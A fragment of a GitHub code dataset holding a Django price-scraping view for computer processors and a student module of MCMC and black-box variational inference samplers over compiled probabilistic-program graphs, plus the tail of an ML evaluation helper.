y_train[:sample_size])\n end = time()\n\n results['train_time'] = end - start\n\n start = time()\n predictions_test = learner.predict(X_test)\n predictions_train = learner.predict(X_train[:300])\n end = time()\n\n results['pred_time'] = end - start\n\n results['acc_train'] = accuracy_score(y_train[:300], predictions_train)\n\n results['acc_test'] = accuracy_score(y_test, predictions_test)\n\n results['f_train'] = fbeta_score(y_train[:300], predictions_train, beta=beta)\n\n results['f_test'] = fbeta_score(y_test, predictions_test, beta=beta)\n\n print(\"{} trained on {} samples.\".format(learner.__class__.__name__, sample_size))\n\n return results\n","repo_name":"shailendrabhandari/ACIT4630_Advanced_MLandDL","sub_path":"visuals.py","file_name":"visuals.py","file_ext":"py","file_size_in_byte":8034,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"13945383524","text":"from django.shortcuts import render\r\nfrom bs4 import BeautifulSoup\r\nfrom django.http import HttpResponseRedirect\r\nimport requests, time, re\r\nfrom .models import Soket, Proc, Price\r\n\r\n\r\ndef get_pr(pr, i, href, price):\r\n pr = Proc.objects.get(name=pr)\r\n i_t = 0\r\n try:\r\n price_list = Price.objects.get(tovar=pr)\r\n except Exception:\r\n price_list = Price(tovar=pr)\r\n if price_list.adress1 == None or price_list.adress1 == \"\":\r\n price_list.adress1 = href\r\n price_list.price1 = price\r\n i_t = 1\r\n elif price_list.adress2 == None or price_list.adress2 == \"\":\r\n price_list.adress2 = href\r\n price_list.price2 = price\r\n i_t = 2\r\n elif price_list.adress3 == None or price_list.adress3 == \"\":\r\n price_list.adress3 = href\r\n price_list.price3 = price\r\n i_t = 3\r\n elif price_list.adress4 == None or price_list.adress4 == \"\":\r\n price_list.adress4 = href\r\n price_list.price4 = price\r\n i_t = 4\r\n elif price_list.adress5 == None or price_list.adress5 == \"\":\r\n price_list.adress5 = href\r\n price_list.price5 = price\r\n i_t = 5\r\n elif price_list.adress6 == None or price_list.adress6 == \"\":\r\n price_list.adress6 = href\r\n price_list.price6 = price\r\n i_t = 6\r\n elif price_list.adress7 == None or price_list.adress7 == \"\":\r\n price_list.adress7 = href\r\n price_list.price7 = price\r\n i_t = 7\r\n elif price_list.adress8 == None or price_list.adress8 == \"\":\r\n price_list.adress8 = href\r\n price_list.price8 = price\r\n i_t = 8\r\n elif price_list.adress9 == None or price_list.adress9 == \"\":\r\n price_list.adress9 = href\r\n price_list.price9 = price\r\n i_t = 9\r\n elif price_list.adress10 == None or price_list.adress10 == \"\":\r\n price_list.adress10 = href\r\n price_list.price10 = price\r\n i_t = 10\r\n price_list.save()\r\n print(\"{0}){1} Сохранен\".format(i_t, pr))\r\n\r\n\r\ndef price(request):\r\n print(\"hello2\")\r\n proc = Proc.objects.all()\r\n for pr1 in proc:\r\n pr = pr1.name.replace('Процессор ', '')\r\n\r\n # url_html = get_url(\"https://repka.ua/catalogsearch/result/?q={0}\".format(pr))\r\n i = 0\r\n # try:\r\n # li_list = soup_price(url_html)\r\n # for li in li_list:\r\n # pr_shor = pr[pr.find('[') + 1:pr.find(']')]\r\n # if li.find('a', class_=\"name\").getText().find(pr_shor) != -1:\r\n # href = li.find('a')['href']\r\n # price = li.find('span', class_=\"price\").getText()\r\n # price = int(price.replace('грн', '').replace(' ', '').replace(' ', ''))\r\n # print(price)\r\n # print(li.find('a')['href'])\r\n #\r\n # get_pr(pr1.name, i, href, price)\r\n #\r\n # i += 1\r\n # break\r\n # except:\r\n # print(\"В репке нет: {0}\".format(pr1.name))\r\n\r\n # url_html = get_url(\"https://eldorado.ua/search?q={0}\".format(pr))\r\n # i = 0\r\n # try:\r\n # li_list = soup_price_2(url_html)\r\n # for li in li_list:\r\n # pr_shor = pr[pr.find('[') + 1:pr.find(']')]\r\n # if li.find('div', class_=\"title lp\").find('div').getText().find(pr_shor) != -1:\r\n # href = li.find('div', class_=\"title lp\").find('a')['href']\r\n # href = \"https://eldorado.ua{0}\".format(href)\r\n # price = li.find('div', class_=\"current-price h1\").getText()\r\n # price = int(price[:price.find(' ')])\r\n # print(pr1.name)\r\n # print(href)\r\n # print(price)\r\n # get_pr(pr1.name, i, href, price)\r\n # i += 1\r\n # break\r\n # except Exception:\r\n # print(\"В магазине Eldarado нет товара: {0}\".format(pr))\r\n # pr_shor = pr[pr.find('[') + 1:pr.find(']')]\r\n # url_html = get_url(\r\n # \"http://amain.com.ua/index.php?route=product/search&search={0}&filter_category_id=1579\".format(pr_shor))\r\n # i = 0\r\n # try:\r\n # li_list = soup_price_3(url_html)\r\n # for li in li_list:\r\n # a = li.find('a', class_=\"product-title to-left color-black\")\r\n # if a == None:\r\n # continue\r\n # if li.find('a', class_=\"product-title to-left color-black\").getText().find(pr_shor) != -1:\r\n # href = li.find('a', 'product-title to-left color-black')['href']\r\n # try:\r\n # price = li.find('p', class_=\"price color-orange\").getText()\r\n # price = int(price.replace('грн', '').replace(' ', '').replace(' ', ''))\r\n # except Exception:\r\n # price = 0\r\n # print(pr1.name)\r\n # print(href)\r\n # print(price)\r\n # get_pr(pr1.name, i, href, price)\r\n # i += 1\r\n # break\r\n # except Exception:\r\n # print(\"В магазине amain нет товара: {0}\".format(pr))\r\n\r\n # pr_shor = pr[pr.find('[') + 1:pr.find(']')]\r\n # url_html = get_url(\"https://telemart.ua/search/?search_que={0}&id_category=398\".format(pr_shor))\r\n # i = 0\r\n # try:\r\n # li_list = soup_price_4(url_html)\r\n # for li in li_list:\r\n # a = li.find('a')\r\n # if a == None:\r\n # continue\r\n # href = li.find('a')['href']\r\n # try:\r\n # price = li.find('div', class_=\"b-price\").getText()\r\n # price = int(price.replace('грн', '').replace(' ', '').replace(' ', ''))\r\n # except Exception:\r\n # price = 0\r\n # print(pr1.name)\r\n # print(href)\r\n # print(price)\r\n # get_pr(pr1.name, i, href, price)\r\n # i += 1\r\n # break\r\n # except Exception:\r\n # print(\"В магазине allo нет товара: {0}\".format(pr))\r\n # pr_shor = pr[pr.find('[') + 1:pr.find(']')]\r\n # url_html = get_url(\"http://57.kharkov.ua/search?title={0}&term_node_tid_depth=All\".format(pr_shor))\r\n # i = 0\r\n # try:\r\n # li_list = soup_price_5(url_html)\r\n # # print(li_list)\r\n # for li in li_list:\r\n # a = li.find('div', class_=\"views-field-title\").find('a')\r\n # if a == None:\r\n # continue\r\n # href = \"57.kharkov.ua{0}\".format(li.find('div', class_=\"views-field-title\").find('a')['href'])\r\n # try:\r\n # price = li.find('div', 'sell-price').getText()\r\n # price = int(price.replace('грн.', '').replace(' ', '').replace(' ', ''))\r\n # except Exception:\r\n # price = 0\r\n # print(pr1.name)\r\n # print(href)\r\n # print(price)\r\n # get_pr(pr1.name, i, href, price)\r\n # i += 1\r\n # break\r\n # except Exception:\r\n # print(\"В магазине fallo нет товара: {0}\".format(pr))\r\n price_1 = Price.objects.all()\r\n for price_list in price_1:\r\n sm = []\r\n adress = []\r\n if price_list.adress1 != None and price_list.adress1 != \"\":\r\n sm.append(price_list.price1)\r\n adress.append(price_list.adress1)\r\n # sm1 = price_list.price1\r\n i_t = 1\r\n if price_list.adress2 != None and price_list.adress2 != \"\":\r\n # sm2 = price_list.price2\r\n sm.append(price_list.price2)\r\n adress.append(price_list.adress2)\r\n\r\n i_t = 2\r\n if price_list.adress3 != None and price_list.adress3 != \"\":\r\n # sm3 = price_list.price3\r\n adress.append(price_list.adress3)\r\n sm.append(price_list.price3)\r\n i_t = 3\r\n if price_list.adress4 != None and price_list.adress4 != \"\":\r\n # sm4 = price_list.price4\r\n i_t = 4\r\n adress.append(price_list.adress4)\r\n sm.append(price_list.price4)\r\n if price_list.adress5 != None and price_list.adress5 != \"\":\r\n # sm5 = price_list.price5\r\n adress.append(price_list.adress5)\r\n i_t = 5\r\n sm.append(price_list.price5)\r\n if price_list.adress6 != None and price_list.adress6 != \"\":\r\n # sm6 = price_list.price6\r\n adress.append(price_list.adress6)\r\n i_t = 6\r\n sm.append(price_list.price6)\r\n if price_list.adress7 != None and price_list.adress7 != \"\":\r\n # sm7 = price_list.price7\r\n adress.append(price_list.adress7)\r\n i_t = 7\r\n sm.append(price_list.price7)\r\n if price_list.adress8 != None and price_list.adress8 != \"\":\r\n # sm8 = price_list.price8\r\n adress.append(price_list.adress8)\r\n i_t = 8\r\n sm.append(price_list.price8)\r\n if price_list.adress9 != None and price_list.adress9 != \"\":\r\n # sm9 = price_list.price9\r\n adress.append(price_list.adress9)\r\n i_t = 9\r\n sm.append(price_list.price9)\r\n if price_list.adress10 != None and price_list.adress10 != \"\":\r\n # sm10 = price_list.price10\r\n adress.append(price_list.adress10)\r\n\r\n i_t = 10\r\n sm.append(price_list.price10)\r\n # print(\"{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}, {9}\".format(sm1, sm2, sm3, sm4, sm5, sm6, sm7, sm8, sm9,\r\n # sm10))\r\n # print(i_t)\r\n ji = 0\r\n min = sm[0]\r\n adr = price_list.adress1\r\n for ch in sm:\r\n print(ch)\r\n if ch != 0:\r\n if ch < min:\r\n min = ch\r\n adr = adress[ji]\r\n ji += 1\r\n price_list.count = i_t\r\n prr = price_list.tovar\r\n prr.min_price = min\r\n prr.min_price_ad = adr\r\n price_list.save()\r\n prr.save()\r\n print(\"money: {0}\".format(min))\r\n return HttpResponseRedirect(request.META[\"HTTP_REFERER\"])\r\n\r\n\r\ndef soup_price_5(html):\r\n temp = BeautifulSoup(html, 'lxml').find('div', class_=\"item-list\").find_all('li')\r\n # print(html)\r\n return temp\r\n\r\n\r\ndef soup_price_4(html):\r\n temp = BeautifulSoup(html, 'lxml').find_all('div', class_=\"b-i-product product_wrapper \")\r\n # print(temp)\r\n return temp\r\n\r\n\r\ndef soup_price(html):\r\n temp = BeautifulSoup(html, 'lxml').find_all('li', class_=\"item product product-item\")\r\n return temp\r\n\r\n\r\ndef soup_price_2(html):\r\n temp = BeautifulSoup(html, 'lxml').find_all('div', class_=\"goods-item false\")\r\n return temp\r\n\r\n\r\ndef soup_price_3(html):\r\n temp = BeautifulSoup(html, 'lxml').find_all('div', class_=\"white-block\")\r\n return temp\r\n\r\n\r\ndef update(request):\r\n print(\"hello1\")\r\n url_html = get_url(\"http://ek.ua/list/186/\")\r\n\r\n temp_soup = BeautifulSoup(url_html, 'lxml').find('div', class_=\"ib page-num\").find_all('a')\r\n ind = 0\r\n for i in temp_soup:\r\n if ind != 0:\r\n url_html = get_url(\"http://ek.ua/list/186/{0}/\".format(ind))\r\n ind += 1\r\n # форма и пагинация\r\n main_page = parsing(url_html)\r\n # форма\r\n table = main_page.find('form').find_all('table', class_=\"conf-table\")\r\n for tr in table:\r\n mas = ['Socket', 'Серия', 'Кол-во', 'Тактовая', 'GPU',\r\n 'Частота TurboBoost /', 'Техпроцесс', 'Архитектура',\r\n '1-го уровня', '2-го уровня', '3-го уровня', 'Тепловыделение',\r\n 'инструкций', 'объем', 'Макс. частота']\r\n a_link = tr.find_all('a', class_=\"conf-name\")\r\n for href in a_link:\r\n html = get_url(\"http://ek.ua{0}\".format(href['href']))\r\n charact = pars_proc(html)\r\n table_list = charact.find_all('table', id=\"help_table\")\r\n kyller = int_vid = False\r\n mas_to = []\r\n for tr_hl in table_list:\r\n print(\"_______\")\r\n temp = tr_hl.find(text=re.compile(r'Комплектуется кулером'))\r\n if temp != None:\r\n par = temp.parent.parent.parent.parent\r\n img = par.find('img')\r\n if img['src'] == \"/img/icons/bul_141.gif\":\r\n kyller = True\r\n temp = tr_hl.find(text=re.compile(r'Интегрированная графика'))\r\n if temp != None:\r\n par = temp.parent.parent.parent.parent\r\n img = par.find('img')\r\n if img['src'] == \"/img/icons/bul_141.gif\":\r\n kyller = True\r\n name = BeautifulSoup(html, 'lxml').find('div', id=\"top-page-title\").find('h1',\r\n class_=\"t2\").getText()\r\n print(\"Процессор) {0}\".format(name))\r\n print(\"Комплектуется кулером) {0}\".format(kyller))\r\n print(\"Интегрированная графика) {0}\".format(int_vid))\r\n for ch in mas:\r\n temp = tr_hl.find(text=re.compile(r\"{0}\".format(ch)))\r\n if temp != None:\r\n par = temp.parent.parent.parent\r\n if par.find('td', class_=\"op3\"):\r\n t = \"\"\r\n else:\r\n par = par.parent\r\n try:\r\n xar = par.find('td', class_=\"op3\").getText()\r\n except Exception:\r\n continue\r\n if ch == \"Socket\":\r\n try:\r\n sk = Soket.objects.get(name=xar)\r\n pr1 = Proc(name=name, cooler=kyller, integer_video=int_vid, sok=sk)\r\n except Exception:\r\n sk = Soket(name=xar)\r\n sk.save()\r\n pr1 = Proc(name=name, cooler=kyller, integer_video=int_vid, sok=sk)\r\n print(sk)\r\n print(\"{0}) {1}\".format(ch, xar))\r\n if ch == 'Серия':\r\n pr1.series = xar\r\n elif ch == \"Кол-во\":\r\n pr1.count_core = xar\r\n elif ch == \"Тактовая\":\r\n pr1.clock_freq = xar\r\n elif ch == \"GPU\":\r\n pr1.model_GPU = xar\r\n elif ch == \"Частота TurboBoost /\":\r\n pr1.freq = xar\r\n elif ch == \"Техпроцесс\":\r\n pr1.proc_tech = xar\r\n elif ch == \"Архитектура\":\r\n pr1.architecture = xar\r\n elif ch == \"1-го уровня\":\r\n pr1.L1 = xar\r\n elif ch == \"2-го уровня\":\r\n pr1.L2 = xar\r\n elif ch == \"3-го уровня\":\r\n pr1.L3 = xar\r\n elif ch == \"Тепловыделение\":\r\n pr1.TDP = xar\r\n elif ch == \"инструкций\":\r\n pr1.sup_instr = xar\r\n elif ch == \"объем\":\r\n pr1.max_vol = xar\r\n elif ch == \"Макс. частота\":\r\n pr1.max_kanal = xar\r\n pr1.save()\r\n mas_to.append(xar)\r\n\r\n return HttpResponseRedirect(request.META[\"HTTP_REFERER\"])\r\n\r\n\r\ndef get_url(url):\r\n kol = 0\r\n while kol < 3:\r\n try:\r\n url_html = get_html(url)\r\n kol = 3\r\n except Exception:\r\n kol += 1\r\n time.sleep(kol)\r\n return url_html\r\n\r\n\r\ndef get_html(url):\r\n response = requests.get(url)\r\n response.encoding = 'utf-8'\r\n return response.text\r\n\r\n\r\ndef pars_proc(html):\r\n soup = BeautifulSoup(html, 'lxml')\r\n list_temp = soup.find('div', id='conf_item_descr')\r\n return list_temp\r\n\r\n\r\ndef parsing(html):\r\n soup = BeautifulSoup(html, 'lxml')\r\n list_temp = soup.find('td', class_='main-part-content')\r\n return list_temp\r\n","repo_name":"XBoBaX/shop_and_game","sub_path":"proccesor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74918872157","text":"import torch\n\nimport copy\nimport time\nimport numpy as np\n\nfrom daphne import daphne\n\nfrom primitives import baseprimitives, distlist\nfrom evaluation_based_sampling import evaluate_program, expectation_calculator\n\nfrom tests import is_tol, run_prob_test,load_truth\n\nfrom plot import draw_hists, draw_trace, draw_log_joint, draw_hitmap\nimport matplotlib.pyplot as plt\n\nimport wandb\n\nwandb.init(project=\"HW4\", entity=\"aliseyfi\")\n\ndef topological_sort(graph):\n nodes = graph[1]['V']\n edges = graph[1]['A']\n is_visited = dict.fromkeys(nodes, False)\n node_stack = []\n node_order_reverse = []\n for node in nodes:\n if not is_visited[node]:\n node_stack.append((node, False))\n while len(node_stack) > 0:\n node, flag = node_stack.pop()\n if flag:\n node_order_reverse.append(node)\n continue\n is_visited[node] = True\n node_stack.append((node, True))\n if node not in edges:\n continue\n children = edges[node]\n for child in children:\n if not is_visited[child]:\n node_stack.append((child, False))\n return node_order_reverse[::-1]\n\n# Put all function mappings from the deterministic language environment to your\n# Python evaluation context here:\nenv = {**baseprimitives, **distlist}\n\ndef deterministic_eval(exp):\n \"Evaluation function for the deterministic target language of the graph based representation.\"\n if isinstance(exp, list):\n if exp[0] == 'hash-map':\n exp = ['hash-map'] + [value for expression in exp[1:] for value in expression]\n return evaluate_program(exp)\n\ndef value_subs(expressions, variables):\n if isinstance(expressions, list):\n result = []\n for expression in expressions:\n result.append(value_subs(expression, variables))\n else:\n if expressions in variables:\n result = variables[expressions]\n else:\n result = expressions\n return result\n\ndef sample_from_joint(graph, var=False):\n \"This function does ancestral sampling starting from the prior.\"\n node_order = topological_sort(graph)\n results = {}\n for node in node_order:\n first_statement, *other_statements = graph[1]['P'].get(node)\n if first_statement == 'sample*':\n dist = deterministic_eval(value_subs(other_statements, results))\n result = dist.sample()\n if first_statement == 'observe*':\n result = deterministic_eval(graph[1]['Y'].get(node))\n results[node] = result\n \n if var:\n return results\n else:\n return deterministic_eval(value_subs(graph[2], results))\n\n# MH with Gibbs sampling\n\ndef mh_within_gibbs_sampling(graph, num_samples):\n \n _, unobserved_variables = extract_variables(graph)\n _, free_variables_inverse = extract_free_variables(graph)\n\n values = [sample_from_joint(graph, var=True)]\n for _ in range(num_samples):\n values.append(gibbs_step(graph[1]['P'], unobserved_variables, values[-1], free_variables_inverse))\n\n sample_temp = deterministic_eval(value_subs(graph[2], values[0]))\n n_params = 1\n if sample_temp.dim() != 0:\n n_params = len(sample_temp)\n samples = torch.zeros(n_params, num_samples+1)\n\n for idx, value in enumerate(values):\n sample = deterministic_eval(value_subs(graph[2], value))\n samples[:, idx] = sample\n return samples, values\n\n\ndef extract_variables(graph):\n observed_variables = []\n for node in graph[1]['V']:\n if graph[1]['P'].get(node)[0] == 'observe*':\n observed_variables.append(node)\n unobserved_variables = [v for v in graph[1]['V'] if v not in observed_variables]\n return observed_variables, unobserved_variables\n\n\ndef extender(l):\n if isinstance(l, list):\n return sum([extender(e) for e in l], [])\n else:\n return [l]\n\ndef extract_free_variables(graph):\n free_variables = {}\n for node in graph[1]['V']:\n expressions = extender(graph[1]['P'].get(node)[1])\n for expression in expressions:\n if expression != node:\n if expression in graph[1]['V']:\n if node in free_variables:\n free_variables[node].append(expression)\n else:\n free_variables[node] = [expression]\n free_var_inverse = {} \n for node in graph[1]['V']:\n for variable in free_variables:\n if node in free_variables[variable]:\n if node not in free_var_inverse:\n free_var_inverse[node] = []\n free_var_inverse[node].append(variable)\n return free_variables, free_var_inverse\n\n\ndef gibbs_step(p, unobserved_variables, value, free_var_inverse):\n for selected_variable in unobserved_variables:\n q = deterministic_eval(value_subs(p[selected_variable][1], value))\n value_new = value.copy()\n value_new[selected_variable] = q.sample()\n alpha = mh_accept(p, selected_variable, value_new, value, free_var_inverse)\n if alpha > torch.rand(1):\n value = value_new\n return value\n\n\ndef mh_accept(p, selected_variable, value_new, value_old, free_var_inverse):\n q_new = deterministic_eval(value_subs(p[selected_variable][1], value_new))\n q_old = deterministic_eval(value_subs(p[selected_variable][1], value_old))\n\n log_q_new = q_new.log_prob(value_old[selected_variable])\n log_q_old = q_old.log_prob(value_new[selected_variable])\n\n log_alpha = log_q_new - log_q_old\n\n Vx = free_var_inverse[selected_variable] + [selected_variable]\n for v in Vx:\n log_alpha += deterministic_eval(value_subs(p[v][1], value_new)).log_prob(value_new[v])\n log_alpha -= deterministic_eval(value_subs(p[v][1], value_old)).log_prob(value_old[v])\n log_alpha = torch.clip(log_alpha, max=0)\n return torch.exp(log_alpha)\n\n# Hamiltonian Monte Carlo\n\ndef hmc(graph, num_samples=1000, num_leapfrog_steps=10, epsilon=0.1, M=None):\n list_observed_variables, list_unobserved_variables = extract_variables(graph)\n initial_variable_values = sample_from_joint(graph, var=True)\n\n observed_variables = {}\n unobserved_variables = {}\n for variable in initial_variable_values:\n if variable in list_observed_variables:\n observed_variables[variable] = initial_variable_values[variable]\n else:\n unobserved_variables[variable] = initial_variable_values[variable]\n if not torch.is_tensor(unobserved_variables[variable]):\n unobserved_variables[variable] = torch.tensor(unobserved_variables[variable], dtype=torch.float64)\n else:\n unobserved_variables[variable] = unobserved_variables[variable].type(torch.float64)\n unobserved_variables[variable].requires_grad = True\n\n if M is None:\n M = torch.eye(len(list_unobserved_variables))\n \n M_inverse = torch.inverse(M)\n P = graph[1]['P']\n samples = []\n\n normal_generator = torch.distributions.MultivariateNormal(torch.zeros(len(M)), M)\n for _ in range(num_samples):\n r = normal_generator.sample()\n new_unobserved_variables, new_r = leapfrog(P, num_leapfrog_steps, epsilon, copy.deepcopy(unobserved_variables), observed_variables, r)\n u = torch.rand(1)\n current_energy = energy(P, M_inverse, unobserved_variables, observed_variables, r)\n new_energy = energy(P, M_inverse, new_unobserved_variables, observed_variables, new_r)\n\n energy_diff = current_energy - new_energy\n energy_diff_clip = torch.clip(energy_diff, max=0)\n if u < torch.exp(energy_diff_clip):\n unobserved_variables = new_unobserved_variables\n\n samples.append(unobserved_variables)\n\n\n sample_temp = deterministic_eval(value_subs(graph[2], samples[0]))\n n_params = 1\n if sample_temp.dim() != 0:\n n_params = len(sample_temp)\n final_samples = torch.zeros(n_params, num_samples)\n\n for idx, sample in enumerate(samples):\n final_sample = deterministic_eval(value_subs(graph[2], sample))\n final_samples[:, idx] = final_sample\n\n return final_samples, samples\n\ndef energy(P, M_inverse, unobserved_variables, observed_variables, r):\n K = torch.matmul(r, torch.matmul(M_inverse, r)) * 0.5\n\n U = 0\n\n all_variables = {**observed_variables, **unobserved_variables}\n for variable in all_variables:\n U = U - deterministic_eval(value_subs(P[variable][1], {**unobserved_variables, **observed_variables})).log_prob(all_variables[variable])\n\n return K + U\n\ndef leapfrog(P, num_leapfrog_steps, epsilon, unobserved_variables, observed_variables, r):\n r_half = r - 0.5*epsilon*grad_energy(P, unobserved_variables, observed_variables)\n new_unobserved_variables = unobserved_variables\n for _ in range(num_leapfrog_steps):\n new_unobserved_variables = detach_and_add_dict_vector(new_unobserved_variables, epsilon*r_half)\n r_half = r_half - epsilon*grad_energy(P, new_unobserved_variables, observed_variables)\n final_unobserved_variables = detach_and_add_dict_vector(new_unobserved_variables, epsilon*r_half)\n final_r = r_half - 0.5*epsilon*grad_energy(P, final_unobserved_variables, observed_variables)\n return final_unobserved_variables, final_r\n\ndef detach_and_add_dict_vector(dictionary, vector):\n new_dictionary = {}\n for i, key in enumerate(list(dictionary.keys())):\n new_dictionary[key] = dictionary[key].detach() + vector[i]\n new_dictionary[key].requires_grad = True\n return new_dictionary\n\ndef grad_energy(P, unobserved_variables, observed_variables):\n U = 0\n for variable in observed_variables:\n U -= deterministic_eval(value_subs(P[variable][1], {**unobserved_variables, **observed_variables})).log_prob(observed_variables[variable])\n U.backward()\n\n U_gradients = torch.zeros(len(unobserved_variables))\n for i, key in enumerate(list(unobserved_variables.keys())):\n U_gradients[i] = unobserved_variables[key].grad\n return U_gradients\n\n\ndef BBVI_evaluator(order_node, graph, sigma):\n P = graph[1]['P']\n Y = graph[1]['Y']\n Q = sigma['Q']\n G = sigma['G']\n optimizer = sigma['optimizer']\n results = {}\n\n for node in order_node:\n link_function = P[node][0]\n\n if link_function == 'sample*':\n d = deterministic_eval(value_subs(P[node][1], results))\n if node not in Q:\n Q[node] = d.make_copy_with_grads()\n optimizer[node] = torch.optim.Adam(Q[node].parameters(), lr=0.01)\n result = Q[node].sample()\n G[node] = grad_log_prob(Q[node], result)\n try:\n sigma_temp = d.log_prob(result) - Q[node].log_prob(result)\n sigma['logW'] += sigma_temp\n except:\n sigma['logW'] += 0\n \n elif link_function == 'observe*':\n result = torch.tensor(Y[node])\n d = deterministic_eval(value_subs(P[node][1], results))\n sigma_temp = d.log_prob(result)\n sigma['logW'] += sigma_temp\n \n results[node] = result\n \n return results, sigma\n\ndef grad_log_prob(dist, value):\n for param in dist.parameters():\n param = param.clone().detach()\n param.requires_grad = True\n log_prob = dist.log_prob(value)\n log_prob.backward()\n grad = [param.grad for param in dist.parameters()]\n return grad\n\ndef BBVI(graph, T, L):\n sigma = {'Q':{}, 'optimizer':{}}\n order_node = topological_sort(graph)\n \n results = []\n log_weights = []\n posteriers = []\n\n for t in range(T):\n sigma['G'] = {}\n gradients = []\n log_ws = []\n\n for l in range(L):\n sigma['logW'] = 0\n result, sigma = BBVI_evaluator(order_node, graph, sigma)\n gradients.append(copy.deepcopy(sigma['G']))\n log_ws.append(sigma['logW'])\n\n if t==0:\n posteriers.append(copy.deepcopy(sigma['Q']['sample2'].parameters()))\n \n ELBO_gradients(gradients, log_ws, sigma['Q'])\n\n for optimizer in sigma['optimizer'].values():\n optimizer.step()\n optimizer.zero_grad()\n \n post_temp = {}\n for q in sigma['Q']:\n post_temp[q] = sigma['Q'][q].parameters().copy()\n\n posteriers.append(post_temp)\n result_temp = deterministic_eval(value_subs(graph[2], result))\n results.append(result_temp)\n log_weights.append(log_ws[-1])\n wandb.log({'ELBO': torch.mean(torch.stack(log_weights)).detach().numpy()})\n\n return results, log_weights, posteriers\n\ndef inf_skipper(gradients, log_ws):\n temp_gradients = []\n temp_log_ws = []\n\n for i in range(len(log_ws)):\n if log_ws[i] == float('-inf'):\n continue\n temp_gradients.append(gradients[i])\n temp_log_ws.append(log_ws[i])\n \n return temp_gradients, temp_log_ws\n\ndef ELBO_gradients(gradients, log_ws, posteriors):\n \n gradients, log_ws = inf_skipper(gradients, log_ws)\n len_grads = len(gradients)\n\n var_union = list(set([var for grad in gradients for var in grad]))\n \n Fs = []\n Gs = []\n stack = {}\n\n for var in var_union:\n gradient_var = gradients[0][var]\n if len(gradient_var[0].shape) > 0 and len(gradient_var[0]) > 1:\n gradient_var = [grad.clone().detach().requires_grad_(True) for grad in gradient_var[0]]\n stack[var] = len(gradient_var)\n\n len_vars = len(gradient_var)\n\n G_var = torch.zeros((len_grads, len_vars))\n F_var = torch.zeros((len_grads, len_vars))\n\n for lg in range(len_grads):\n G_var[lg, :] = torch.stack(gradients[lg][var])\n F_var[lg, :] = G_var[lg, :] * log_ws[lg]\n Gs.append(G_var.detach().numpy())\n Fs.append(F_var.detach().numpy())\n \n Gs = np.column_stack(Gs)\n Fs = np.column_stack(Fs)\n \n num = np.sum([np.cov(Fs[:, v], Gs[:, v])[0, 1] for v in range(Gs.shape[1])])\n denum = np.sum([np.var(Gs[:, v]) for v in range(Gs.shape[1])])\n b_hat = 0.\n if not denum == 0. and not np.isnan(num):\n b_hat = num/denum\n\n counter_1 = 0\n for var in var_union:\n gradient_var = gradients[0][var]\n counter_2 = len(gradient_var)\n if var in stack:\n counter_2 = stack[var]\n g_hat = np.array([np.sum(Fs[:, v] - b_hat * Gs[:, v]) / len_grads for v in range(counter_1, counter_1+counter_2)])\n if var in stack:\n g_hat = [g_hat]\n for i, parameter in enumerate(posteriors[var].parameters()):\n parameter.grad = torch.tensor(-g_hat[i], dtype=parameter.grad.dtype)\n counter_1 += counter_2\n return\ndef get_stream(graph):\n \"\"\"Return a stream of prior samples\n Args: \n graph: json graph as loaded by daphne wrapper\n Returns: a python iterator with an infinite stream of samples\n \"\"\"\n while True:\n yield sample_from_joint(graph)\n\n\n\n\n#Testing:\n\ndef run_deterministic_tests():\n \n for i in range(1,13):\n #note: this path should be with respect to the daphne path!\n graph = daphne(['graph','-i','/Users/aliseyfi/Documents/UBC/Semester3/Probabilistic-Programming/HW/Probabilistic-Programming/Assignment_3/programs/tests/deterministic/test_{}.daphne'.format(i)])\n truth = load_truth('/Users/aliseyfi/Documents/UBC/Semester3/Probabilistic-Programming/HW/Probabilistic-Programming/Assignment_3/programs/tests/deterministic/test_{}.truth'.format(i))\n ret = deterministic_eval(graph[-1])\n print(ret)\n try:\n assert(is_tol(ret, truth))\n except AssertionError:\n raise AssertionError('return value {} is not equal to truth {} for graph {}'.format(ret,truth,graph))\n \n print('Test passed')\n \n print('All deterministic tests passed')\n \n\n\ndef run_probabilistic_tests():\n \n #TODO: \n num_samples=1e4\n max_p_value = 1e-4\n \n for i in range(1,7):\n #note: this path should be with respect to the daphne path! \n graph = daphne(['graph', '-i', '/Users/aliseyfi/Documents/UBC/Semester3/Probabilistic-Programming/HW/Probabilistic-Programming/Assignment_3/programs/tests/probabilistic/test_{}.daphne'.format(i)])\n\n truth = load_truth('/Users/aliseyfi/Documents/UBC/Semester3/Probabilistic-Programming/HW/Probabilistic-Programming/Assignment_3/programs/tests/probabilistic/test_{}.truth'.format(i))\n \n stream = get_stream(graph)\n \n p_val = run_prob_test(stream, truth, num_samples)\n \n print('p value', p_val)\n assert(p_val > max_p_value)\n \n print('All probabilistic tests passed') \n \n \nif __name__ == '__main__':\n \n\n # run_deterministic_tests()\n # run_probabilistic_tests()\n\n # Task 1\n # graph_1 = daphne(['graph','-i','/Users/aliseyfi/Documents/UBC/Semester3/Probabilistic-Programming/HW/Probabilistic-Programming/Assignment_4/programs/{}.daphne'.format(1)])\n # print('\\n\\n\\nSample of posterior of program {}:'.format(1)) \n # T_1 = int(1 * 1e4)\n # L_1 = 50\n # start_time_1 = time.time()\n # samples_1, log_weights_1, posteriors_1 = BBVI(graph_1, T_1, L_1)\n # print('Time taken:', time.time() - start_time_1)\n # samples_1 = torch.stack(samples_1).numpy()\n # weights_1 = np.exp(torch.stack(log_weights_1).detach().numpy())\n\n # print(posteriors_1[-1]['sample2'])\n\n # new_samples = torch.distributions.Normal(*posteriors_1[-1]['sample2']).sample((10000,)).view(1,-1)\n # draw_hists('BBVI', new_samples, 1)\n\n\n # Task 2\n # graph_2 = daphne(['graph','-i','/Users/aliseyfi/Documents/UBC/Semester3/Probabilistic-Programming/HW/Probabilistic-Programming/Assignment_4/programs/{}.daphne'.format(2)])\n # print('\\n\\n\\nSample of posterior of program {}:'.format(2)) \n # T_2 = int(1 * 1e4)\n # L_2 = 50\n # start_time_2 = time.time()\n # samples_2, log_weights_2, posteriors_2 = BBVI(graph_2, T_2, L_2)\n # print('Time taken:', time.time() - start_time_2)\n # samples_2 = torch.stack(samples_2).numpy()\n # weights_2 = np.exp(torch.stack(log_weights_2).detach().numpy())\n \n # samples_mean_slope = (samples_2[:,0] * weights_2).sum() / weights_2.sum()\n\n # samples_mean_bias = (samples_2[:,1] * weights_2).sum() / weights_2.sum()\n \n # 